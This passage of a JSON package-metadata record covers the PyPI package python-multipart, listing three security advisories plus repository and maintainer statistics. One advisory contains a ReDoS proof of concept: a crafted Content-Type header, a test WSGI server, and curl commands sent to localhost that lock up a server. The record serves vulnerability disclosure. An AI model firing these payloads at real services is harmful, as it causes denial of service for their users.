configurations.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-26T23:28:05.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg","https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4","https://github.com/Kludex/python-multipart/releases/tag/0.0.22","https://nvd.nist.gov/vuln/detail/CVE-2026-24486","https://github.com/advisories/GHSA-wp53-j4wj-2cfg"],"source_kind":"github","identifiers":["GHSA-wp53-j4wj-2cfg","CVE-2026-24486"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-27T00:00:08.310Z","updated_at":"2026-06-14T01:02:16.156Z","epss_percentage":0.01021,"epss_percentile":0.77525,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cDUzLWo0d2otMmNmZ84ABRlg","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13cDUzLWo0d2otMmNmZ84ABRlg","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.22","vulnerable_version_range":"\u003c 0.0.22"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cDUzLWo0d2otMmNmZ84ABRlg/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01OWc1LXhnY3EtNHF3M84ABB_q","url":"https://github.com/advisories/GHSA-59g5-xgcq-4qw3","title":"Denial of service (DoS) via deformation `multipart/form-data` boundary","description":"### Summary\n\nWhen parsing form data, `python-multipart` skips line breaks (CR `\\r` or LF `\\n`) in front of the first boundary and any tailing bytes after the last boundary. This happens one byte at a time and emits a log event each time, which may cause excessive logging for certain inputs.\n\nAn attacker could abuse this by sending a malicious request with lots of data before the first or after the last boundary, causing high CPU load and stalling the processing thread for a significant amount of time. In case of ASGI application, this could stall the event loop and prevent other requests from being processed, resulting in a denial of service (DoS).\n\n### Impact\n\nApplications that use `python-multipart` to parse form data (or use frameworks that do so) are affected. \n\n### Original Report\n\nThis security issue was reported by:\n- GitHub security advisory in Starlette on October 30 by @Startr4ck\n- Email to `python-multipart` maintainer on October 3 by @mnqazi","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-12-02T21:37:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-59g5-xgcq-4qw3","https://nvd.nist.gov/vuln/detail/CVE-2024-53981","https://github.com/Kludex/python-multipart/commit/c4fe4d3cebc08c660e57dd709af1ffa7059b3177","https://github.com/advisories/GHSA-59g5-xgcq-4qw3"],"source_kind":"github","identifiers":["GHSA-59g5-xgcq-4qw3","CVE-2024-53981"],"repository_url":"https://github.com/Kludex/python-multipart","blast_radius":35.56369833494301,"created_at":"2024-12-02T22:07:14.232Z","updated_at":"2026-06-14T01:04:09.790Z","epss_percentage":0.00121,"epss_percentile":0.30846,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01OWc1LXhnY3EtNHF3M84ABB_q","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01OWc1LXhnY3EtNHF3M84ABB_q","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.18","vulnerable_version_range":"\u003c 0.0.18"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01OWc1LXhnY3EtNHF3M84ABB_q/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yanY1LTlyODgtM3czcM4AA5N5","url":"https://github.com/advisories/GHSA-2jv5-9r88-3w3p","title":"python-multipart vulnerable to Content-Type Header ReDoS","description":"### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a simple WSGI application, that just parses the `Content-Type`, and run it with `python main.py`:\n\n```Python\n# main.py\nfrom wsgiref.simple_server import make_server\nfrom wsgiref.validate import validator\n\nfrom multipart.multipart import parse_options_header\n\n\ndef simple_app(environ, start_response):\n _, _ = parse_options_header(environ[\"CONTENT_TYPE\"])\n\n start_response(\"200 OK\", [(\"Content-type\", \"text/plain\")])\n return [b\"Ok\"]\n\n\nhttpd = make_server(\"\", 8123, validator(simple_app))\nprint(\"Serving on port 8123...\")\nhttpd.serve_forever()\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'\n```\n\n### Impact\n\nThis is a ReDoS, (Regular expression Denial of Service), so it only applies to those using python-multipart to read form data, such as Starlette and FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal report to FastAPI\u003c/summary\u003e\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n\u003c/details\u003e","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-02-12T17:28:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p","https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4","https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74","https://nvd.nist.gov/vuln/detail/CVE-2024-24762","https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5","https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc","https://github.com/pypa/advisory-database/tree/main/vulns/fastapi/PYSEC-2024-38.yaml","https://github.com/tiangolo/fastapi/releases/tag/0.109.1","https://github.com/github/advisory-database/pull/4829","https://github.com/advisories/GHSA-2jv5-9r88-3w3p"],"source_kind":"github","identifiers":["GHSA-2jv5-9r88-3w3p","CVE-2024-24762"],"repository_url":"https://github.com/Kludex/python-multipart","blast_radius":0.0,"created_at":"2024-02-12T20:25:25.665Z","updated_at":"2026-06-14T01:06:05.542Z","epss_percentage":0.03333,"epss_percentile":0.87501,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yanY1LTlyODgtM3czcM4AA5N5","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yanY1LTlyODgtM3czcM4AA5N5","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.7","vulnerable_version_range":"\u003c= 0.0.6"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yanY1LTlyODgtM3czcM4AA5N5/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/python-multipart","docker_dependents_count":2067,"docker_downloads_count":57996878,"usage_url":"https://repos.ecosyste.ms/usage/pypi/python-multipart","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/python-multipart/dependencies","status":null,"funding_links":["https://github.com/sponsors/Kludex"],"critical":true,"issue_metadata":{"last_synced_at":"2024-09-30T02:35:49.998Z","issues_count":59,"pull_requests_count":146,"avg_time_to_close_issue":47266892.3877551,"avg_time_to_close_pull_request":3817486.2615384613,"issues_closed_count":49,"pull_requests_closed_count":130,"pull_request_authors_count":15,"issue_authors_count":29,"avg_comments_per_issue":2.6440677966101696,"avg_comments_per_pull_request":1.0547945205479452,"merged_pull_requests_count":113,"bot_issues_count":0,"bot_pull_requests_count":27,"past_year_issues_count":28,"past_year_pull_requests_count":138,"past_year_avg_time_to_close_issue":1882815.68,"past_year_avg_time_to_close_pull_request":1163505.0327868853,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":122,"past_year_pull_request_authors_count":12,"past_year_issue_authors_count":13,"past_year_avg_comments_per_issue":1.9642857142857142,"past_year_avg_comments_per_pull_request":1.0869565217391304,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":25,"past_year_merged_pull_requests_count":109,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/issues","maintainers":[{"login":"Kludex","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Kludex"},{"login":"andrew-d","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrew-d"},{"login":"tomchristie","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tomchristie"}],"active_maintainers":[{"login":"Kludex","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Kludex"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/codemeta","maintainers":[{"uuid":"Kludex","login":"Kludex","name":null,"email":null,"url":null,"packages_count":108,"html_url":"https://pypi.org/user/Kludex/","role":null,"created_at":"2023-02-25T06:24:55.666Z","updated_at":"2023-02-25T06:24:55.666Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/Kludex/packages"},{"uuid":"tomchristie","login":"tomchristie","name":null,"email":null,"url":null,"packages_count":53,"html_url":"https://pypi.org/user/tomchristie/","role":null,"created_at":"2023-02-25T06:24:55.689Z","updated_at":"2023-02-25T06:24:55.689Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/tomchristie/packages"},{"uuid":"andrew_d","login":"andrew_d","name":null,"email":null,"url":null,"packages_count":4,"html_url":"https://pypi.org/user/andrew_d/","role":null,"created_at":"2023-02-25T06:24:55.629Z","updated_at":"2023-02-25T06:24:55.629Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/andrew_d/packages"}]}